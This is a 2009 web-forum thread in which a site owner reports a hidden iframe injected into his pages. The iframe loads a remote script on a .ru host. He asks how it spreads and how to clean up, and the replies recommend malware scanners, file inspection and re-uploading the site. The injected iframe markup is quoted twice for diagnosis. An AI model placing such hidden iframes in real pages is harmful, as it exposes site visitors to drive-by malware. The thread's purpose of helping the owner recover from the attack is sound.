Forum Moderators: phranque
<iframe src="http://example.ru:8080/ts/inx.cgi?pepsi119" width=125 height=125 style="visibility: hidden">
I have also changed my FTP password.
a couple questions
1. if i remove the code from all pages on server does it mean the Trojan is gone or does it still live on the server somehow?
2. if a Trojan or bad code like what I pasted above is in 1 page can it spread to other pages by itself or is it only FTP injected once?
3. if a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post) can it become active where it is pasted?
4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect or possibly connecting to the example.ru website. So the question is, if my computer was not infected and I hit the refresh button would that infect my computer?
finally, some of these questions arise because I dont know how far I have to go to "clean" everything. do I have to reinstall OS locally and wipe the server clean too?
Its a bit more complicated because I recently hired a Eastern European company to work on a new version of my site and I also suspect they might have somehow caused this (not intentionally....they have very high ratings on Elance anyway - FWIW). But they did access the server a couple times (and I always changed password after).
So how do i know its not me or if its them? sorry about the confusion!
[edited by: jdMorgan at 11:04 pm (utc) on July 29, 2009]
[edit reason] Please don't post potentially-dangerous URLs! [/edit]
the that code that is redirecting (or attempting to redirect)is In the file source
at top of the body code:
</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">
the url http://example.rn is listed on MalwareURL.com as bad and it seemed to show in a few other Google results.
--
this is code in my web pages on my server
it has been seen elsewhere like by 1and 1 support and the developer. accessed from (mac or pc)
bootime scan reveals nothing on my system (mac or pc) and windows updates normally.
it does try to redirect , its a hidden iframe but the page loads (but the page header/graphics is shifted down by about 2 " )
then if you try to refresh the browser, you can see it attempting to load the bad/remote url (but it dosnt fully parse the page- it just keep loading in the status bar)
--
UPDATE:
turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. they said it has been cleaned.
if anyone is following this thread it would help to get some feedback because even though I now know the source, most of my questions have not been answered. given that now Im kind of paranoid, I'd really like to know more about how these things work.
in addition to all the previous questions, how I scan my server or a database if I want to?
is it possible to scan for keywords?
And if that malicious code was a worm, it could infect other machines on your local network.
But that is a lot of 'ifs.'
Similarly, there's no way to know ahead of time what shape your server might be in.
For your PC, download, install and run every free malware scanner you can find. There are many free and good 'independent' ones like the well-known Ad-Aware, Spybot Search & Destroy, and MalWareBytes Anti-Malware, in addition to the free utilities offered by almost all of the well-known anti-virus software companies. Some are download/install, while others are for on-line use -- generally using ActiveX in IE and/or Java in other browsers to execute on your machine. Run as many of those as you can find... my list is over a dozen so far.
For your server, remove the obvious changes such as the iFrame, then go look carefully at every page and included object. Also look carefully at any executable scripts that you've got. If there are too many files to make this inspection feasible, then consider simply re-uploading the site.
Since you've changed your server login credentials that door is now closed, but be on the lookout for other entry-ways being used. If your site is hacked again, you'll likely need to get your host involved to find the 'open doors' and possibly to trace the hacking activity.
Best,
Jim
